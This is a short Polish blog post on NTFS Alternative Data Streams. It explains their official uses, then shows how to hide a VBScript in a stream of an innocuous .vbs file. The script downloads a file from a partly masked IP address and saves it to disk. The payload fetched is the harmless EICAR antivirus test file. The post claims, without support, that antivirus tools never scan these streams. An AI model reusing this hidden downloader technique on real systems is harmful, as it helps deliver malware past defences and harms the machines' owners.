Złośliwość & ADS [Alternative Data Stream]

in #polish7 years ago (edited)


Wykorzystanie funkcjonalności ADS systemu plików NTFS w celu uruchomienia złośliwej aplikacji 

TL;DR

Można w całkowicie bezproblemowy sposób ukryć złośliwe programy czy treść na waszym komputerze i żaden antywirus nie będzie tego świadom ;)

Oficjalne zastosowanie ADS-ów

Jako jedno z zastosowań ADS (AlternativeData Stream) przedstawia pliki "Zone Identifier" będące rozszerzeniem dla pliku podstawowego, a zawierające metadane - na przykład informacje o pochodzeniu.
Przeglądarka internetowa jest w stanie oznaczyć plik odpowiednią wartością Zone-Identifier dzięki temu przy próbie otwarcia go z poziomu Windowsa otrzymamy taki komunikat bezpieczeństwa:
źródło: sekurak.pl
Informacja, że dany plik może być niebezpieczny ponieważ pochodzi z internetu.
Kolejnym założeniem ADS miała być kompatybilność między systemami MacOS, a Windows ponieważ swego czasu Windows nie zapisywał metadanych o utworach muzycznych i kopiowanie utworów z jednego systemu na drugi kończyło się brakiem możliwości sprawdzenia autora, tytułu utworu, zespołu...lub nawet brakiem możliwości skopiowania danych ze względu na brak pełnej kompatybilności NTFS (Windows), a HFS (Apple).
Po więcej informacji o możliwościach rozszerzonych strumieni danych odsyłam do dokumentacji oraz kilku innych źródeł [1][2][3].

Mniej oficjalne zastosowanie ADS :)

Jesteśmy w katalogu Workdir, który jest pusty:
Utworzymy sobie "czysty" pliczek *.vbs oraz eicar.txt (służy do testowania antywirusów - powinien zawsze być wykrywany):
No i jest wykrywany. :) 
A .vbs tworzy nam niewinne okienko.
Teraz zrobimy sobie ADS'iątko. Jest to tak proste jak dodanie dwukropka do nazwy już istniejącego pliku. Tym razem namieszamy!
I wpisujemy tam takie cosik:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://xxx.xxx.xx.164/eicar/eicar.txt", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "w:\WorkDir\eicar.txt", 2 '//overwrite
end with

Uruchamiamy i...

...downloader pobiera złośliwy plik. :)

Ciekawostka - ADS nie są skanowane przez anwywirusy/antymalware.

Myślę, że na dziś to by było wszystko. Zachęcam do własnoręcznego zgłębienia tematów i możliwości bo gdy dwa lata temu odkryłem ADS i jego właściwości to wszystko działało. Piszę ten artykuł dziś z nowymi screenshootami i skryptami...i jest tak samo.

ツ